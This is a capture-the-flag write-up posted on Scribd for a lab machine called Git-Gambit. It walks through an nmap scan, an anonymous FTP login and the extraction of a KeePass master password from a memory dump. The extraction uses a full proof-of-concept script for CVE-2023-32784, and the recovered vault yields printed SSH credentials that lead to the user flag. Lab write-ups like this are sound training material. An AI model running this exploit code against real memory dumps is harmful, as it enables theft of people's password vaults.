Scribd Logo
Upload

Welcome to Scribd!

  • 7 views

    Git Gambit User Report 1

    Uploaded by

    mrgods.home
    The document discusses using Nmap to scan ports on a target IP address, anonymous FTP login to download files, finding credentials in a memory dump file, and using Keepass to open an encrypted vault file containing SSH credentials to access the system and retrieve a user flag.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd

    Git Gambit User Report 1

    Uploaded by

    mrgods.home
    7 views11 pages
    The document discusses using Nmap to scan ports on a target IP address, anonymous FTP login to download files, finding credentials in a memory dump file, and using Keepass to open an encrypted vault file containing SSH credentials to access the system and retrieve a user flag.

    Original Title

    Git-Gambit-user-report-1

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    The document discusses using Nmap to scan ports on a target IP address, anonymous FTP login to download files, finding credentials in a memory dump file, and using Keepass to open an encrypted vault file containing SSH credentials to access the system and retrieve a user flag.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    7 views11 pages

    Git Gambit User Report 1

    Uploaded by

    mrgods.home
    The document discusses using Nmap to scan ports on a target IP address, anonymous FTP login to download files, finding credentials in a memory dump file, and using Keepass to open an encrypted vault file containing SSH credentials to access the system and retrieve a user flag.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    of 11

    Git-Gambit

    Recon
    Lets Start With NMAP

    sudo nmap -sCV 10.1.75.221 -p-

    Anonymous Login Allowed FTP

    ftp [email protected] -p 5555


    Download Both

    When i Unzipped ,
    When googling found this ,

    import argparse
    import logging
    import itertools

    class TaggedFormatter(logging.Formatter):

    TAGS = {
    'DEBUG': '\x1b[1;35m#\x1b[0m',
    'INFO': '\x1b[1;34m.\x1b[0m',
    'WARNING': '\x1b[1;33m-\x1b[0m',
    'ERROR': '\x1b[1;31m!\x1b[0m',
    'CRITICAL': '\x1b[1;31m!!\x1b[0m'
    }

    def __init__(self, format):


    logging.Formatter.__init__(self,
    format)

    def format(self, record):


    levelname = record.levelname

    if levelname in self.TAGS:
    record.levelname =
    self.TAGS[levelname]

    return
    logging.Formatter.format(self, record)

    def setup_logging(debug = False):


    formatter = TaggedFormatter('%
    (asctime)s [%(levelname)s] [%(name)s] %
    (message)s')
    handler = logging.StreamHandler()
    root_logger = logging.getLogger()

    handler.setFormatter(formatter)
    root_logger.addHandler(handler)

    if debug:

    root_logger.setLevel(logging.DEBUG)
    else:
    root_logger.setLevel(logging.INFO)

    def parse_args():
    parser =
    argparse.ArgumentParser(description='CVE-
    2023-32784 proof-of-concept')

    parser.add_argument('dump', type=str,
    help='The path of the memory dump to
    analyze')
    parser.add_argument('-d', '--debug',
    dest='debug', action='store_true',
    help='Enable debugging mode')

    return parser.parse_args()

    def get_candidates(dump_file):
    data = dump_file.read()
    candidates = []
    str_len = 0
    i = 0

    while i < len(data)-1:


    if (data[i] == 0xCF) and (data[i +
    1] == 0x25):
    str_len += 1
    i += 1
    elif str_len > 0:
    if (data[i] >= 0x20) and
    (data[i] <= 0x7E) and (data[i + 1] ==
    0x00):
    candidate = (str_len *
    b'\xCF\x25') + bytes([data[i], data[i +
    1]])

    if not candidate in
    candidates:

    candidates.append(candidate)

    str_len = 0

    i += 1

    return candidates

    if __name__ == '__main__':
    args = parse_args()
    setup_logging(args.debug)
    logger = logging.getLogger('main')
    with open(args.dump, 'rb') as
    dump_file:
    logger.info(f'Opened
    {dump_file.name}')

    candidates =
    get_candidates(dump_file)
    candidates = [x.decode('utf-16-
    le') for x in candidates]
    groups = [[] for i in
    range(max([len(i) for i in candidates]))]

    for candidate in candidates:


    groups[len(candidate) -
    1].append(candidate[-1])

    for i in range(len(groups)):
    if len(groups[i]) == 0:

    groups[i].append(b'\xCF\x25'.decode('utf-
    16-le'))
    for password in
    itertools.product(*groups):
    password = ''.join(password)
    print(f'Possible password:
    {password}')

    Password : strongpassherehello

    Install keepass in windows to open auth.kdbx


    There i found , user

    john : YvbseSFRp2Ed4DCjTucNKB

    Yes it is SSH creds , Logged in


    Got user.txt !

    You might also like